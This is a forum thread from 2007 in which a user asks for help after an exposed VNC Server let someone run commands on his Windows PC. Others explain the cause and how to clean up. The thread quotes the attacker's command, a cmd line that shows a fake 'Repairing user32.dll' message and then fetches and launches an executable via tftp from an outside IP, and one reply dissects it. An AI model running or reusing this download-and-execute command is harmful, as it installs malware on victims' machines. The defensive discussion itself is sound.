Trojan from using VNC Viewer Software

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
Hey guys. I've bene using the VNC Viewer software to access a Linux
environment at my University's Linux servers.

However, I have over the last few days had a number of occurances of a
Trojan somehow finding its way onto my computer. At some point I would
suddenly lose control of the computer. A Task Manager window would
come up, followed by a run window. In this run window the following
two things are entered:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
64.79.213.12 GET ktqjy.exe & start ktqjy&

%systemroot%\system32\cmd.exe

In the past I have always been at my computer, so I have been able to
interrupt it by just turning the computer off before it can do that it
is trying to do. Following the last occurance I spent all afternoon
running virus scans and spyware scans using:

AVG Anti virus
AVG anti spyware
Zonealarm Pro's spyware scanner
Spybot Search and Destroy

A Trojan was found (called Generic3.ARX) by AVG and a number of
Spyware items were found and deleted. Satisfied that allw as well, I
opened up the VNC Viewer software and got back to work.

However, today whilst I went away to get a drink the Trojan ran again.
This time I was unable to interrupt it and I came back to find a Task
manager window, a run window and a command prompt all open. Clearly
whatever the Trojan tries to do it has succeeded. I am running both
AVG anti virus and anti spyware scans at the moment but nothing
appears to be coming up this time.

Therefore, what can I do to eradicate whatever this Trojan has done to
my computer? What sort of things would this Trojan do? (or begin doing
as we speak?). Simply stop using VNC Viewer is not an option as I need
it to do my coursework.

I run the latest version of ZoneAlarm Pro along with the other
programmes mentioned above to combat spyware.

Kind regards,

Matt


Re: Trojan from using VNC Viewer Software

Matt wrote  on 30 Mar 2007 08:55:11 -0700:

Quoted text here. Click to load it


This should have nothing to do with the Viewer, are you sure you didn't also
install the Server on your own machine and leave the port open to the
outside world? See
http://www.realvnc.com/pipermail/vnc-list/2007-February/057050.html
for more info, basically someone/something is connecting to the VNC Server
on your machine bypassing the authentication, and then running the commands
(either manually or using a script, most likely using a script). I'm
guessing that when you downloaded and installed VNC Viewer you actually
download the full Client+Server package and installed both, and you allowed
VNC Server to listen in Zone Alarm, probably when it first ran and you
blindly hit the Allow button. Get your machine cleaned and uninstall VNC
Server - you do not need the server component to use the Viewer to access
another machine.

Dan



Re: Trojan from using VNC Viewer Software

Quoted text here. Click to load it

You are absolutely right, I did install the full package and probably
did tell ZoneAlarm to let it have special prividedges. I will
uninstall it right away. The only problem is that I don't think I am
going to be able to "clean" ym computer, because after running all the
scans I mentioend above, none of them came up with anything.

Is their anything I can do aside from reformatting my computer to
ensure I get rid of this?

Kind Regards,

Matt


Re: Trojan from using VNC Viewer Software


Quoted text here. Click to load it

Use Autoruns to look for startup programs that you didn't authorize.  Look
for any instances of DLL files being loaded on startup that are not
authorized.  You can try looking in the System32 directory for recently
modified files, or hidden files that have random names like xzlk.dll, and
send the files found to http://www.virustotal.com/en/indexf.html for
analysis.  You could also try running a spyware scanner like Spybot Search
& Destroy or SuperAntiSpyware; the later can detect files based on
characteristics like size, random file names, and other attributes that are
common among trojans and malware.

Re: Trojan from using VNC Viewer Software

Quoted text here. Click to load it

<http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>

Re: Trojan from using VNC Viewer Software

Quoted text here. Click to load it

That makes for some interesting reading, looks like a reformat is the
only option.

Thanks to everyone for all the replies.

Kind Regards,

Matt


Re: Trojan from using VNC Viewer Software

Matt wrote:
Quoted text here. Click to load it

There are exploits that modify the POST code and BIOS so that even
reformatting may not help :-(  Is it time for a new computer???

Re: Trojan from using VNC Viewer Software

Rick Merrill wrote:
Quoted text here. Click to load it

??? i've never heard of anything specifically modifying the power on
self test (post) facility of a computer (isn't it *part of* the bios?)...

as for the bios, the only modifications any known malware has ever made
is to corrupt flashable bios, and that is rather noticable as it stops
the computer from booting...

so no, it's not time for a new computer yet...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Trojan from using VNC Viewer Software

kurt wismer wrote:

Quoted text here. Click to load it

Actually it's quite trivial to modify the BIOS (intentionally!), see what
the BIOS modder communities are achieving. It would be no problem to
implement such malware.

There have been extensive discussions about the default settings for
enabling flashing the BIOS as well as how well these actually work. If you
have a hardware-implemented switch, if it's set to disabled, and you flash
chip is not one of those old Intel or Amtel chips from before about 2001,
it shouldn't be possible to flash the BIOS.

Re: Trojan from using VNC Viewer Software

Quoted text here. Click to load it

Well I formatted and reinstalled Windows a few days ago now and
everything seems to be running smoothly.

Thanks again for all the replies on this topic.

Kind regards,

Matt


Re: Trojan from using VNC Viewer Software

Matt wrote:

Quoted text here. Click to load it

Yes and no.

Everything that restores your computer to a well-known safe state is an
option. If you have a verified backup, you can restore from that. You can
compare against a complete reference system. If you have a backup
containing a list of checksums of all system-relevant files, you can detect
the changes and selective restore these parts (or verify them as harmless
changes). You can boot a trusted system and verify all signed binaries and
just restore all relevant data files (Windows Registry and some other
databases, some INF and INI files, boot sector etc.).

But, if no such safe reference exists, the only well-known safe state is a
fresh install. Sadly, this is the most common case.

Re: Trojan from using VNC Viewer Software

Quoted text here. Click to load it

Well assuming your original post contains the only commands that were
run here's what we can figure out.

"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -
i
64.79.213.12 GET ktqjy.exe & start ktqjy& "

%comspec% is an environment variable on windows system which points to
the command prompt executable. We can verify this by launching a
command prompt and echo'ing the value to the screen, ie:
C:\Documents and Settings\someuser>echo %comspec%
C:\WINNT\system32\cmd.exe

Next we can see what the /c switch does for the command prompt
(cmd.exe), ie:
C:\Documents and Settings\someuser>cmd.exe /?
Starts a new instance of the Windows XP command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /
V:OFF]
    [[/S] [/C | /K] string]

/C      Carries out the command specified by string and then
terminates

Ok so /c carries out the commands provided when cmd.exe is called (via
%comspec%).

Next we see that he echo'd some useless junk to the
screen....Repairing....Please Wait, laaa deee daaaa.

Next he uses tftp to connect to 64.79.213.12 and get ktqjy.exe. We can
verify this by checking the command optionsn for tftp:

C:\Documents and Settings\someuser>tftp /?

Transfers files to and from a remote computer running the TFTP
service.

TFTP [-i] host [GET | PUT] source [destination]

  -i              Specifies binary image transfer mode (also called
                  octet). In binary image mode the file is moved
                  literally, byte by byte. Use this mode when
                  transferring binary files.

So -i specifies binary transfer which is what he'd need for a
executable (exe).

Lastly he launches ktqjy.

ktqjy.exe should be sitting in whatever the default directory of your
command prompt is, something like "C:\Documents and Settings\someuser"
if you goto the start menu select run type cmd and hit ok it'll be
displayed on the screen. You can navigate to this directory in
explorer and delete the file. You may have to launch task manager and
"End Process" on it first. Also you should fire up msconfig (start:run
msconfig) and review all your startup items.

etc....

Just follow the information you have.


Re: Trojan from using VNC Viewer Software

kingthorin@gmail.com wrote:

Quoted text here. Click to load it

In the meanwhile, ktqjy.exe has modified various system binaries, imposed
some kernel hooks such that killing just removes it from the list of
processed (but still keeps on running) and doesn't list the three other
copies of itself not any more, has downloaded 5 other binaries and executed
some, modified some system settings to open some obstrusive security
vulnerabilities to allow easier reinfection, ...

Oh, and it might have simply modified the previous history.

Short to say: You have no reliable information whatsoever.

Re: Trojan from using VNC Viewer Software

On Fri, 30 Mar 2007 08:55:11 -0700, Matt wrote:

Quoted text here. Click to load it

First, how do you know it's a trojan STILL on your system?

Did you reset the VNC connection password?

Did you change the default VNC Server port to something other than 5900?

Why is your computer exposed directly to the internet instead of behind a
NAT appliance of some type?


 
--  
Want to know what PCBUTTS1 is really about?
*** WARNING - this links contains foul/pornographic content of an  
abusive nature created by PCBUTTS1 and still hosted on his public  
website ***
http://www.pcbutts1.com/downloads/leythos.htm

Re: Trojan from using VNC Viewer Software

Quoted text here. Click to load it

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

Quoted text here. Click to load it

I'm using VNC Viewer 4.1.2 (the free one) which has no such option

Quoted text here. Click to load it

Again, I had no such option

Quoted text here. Click to load it

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt



Re: Trojan from using VNC Viewer Software

Quoted text here. Click to load it

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

Quoted text here. Click to load it

I'm using VNC Viewer 4.1.2 (the free one0 which has no such option

Quoted text here. Click to load it

Again, I had no such option

Quoted text here. Click to load it

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt



Site Timeline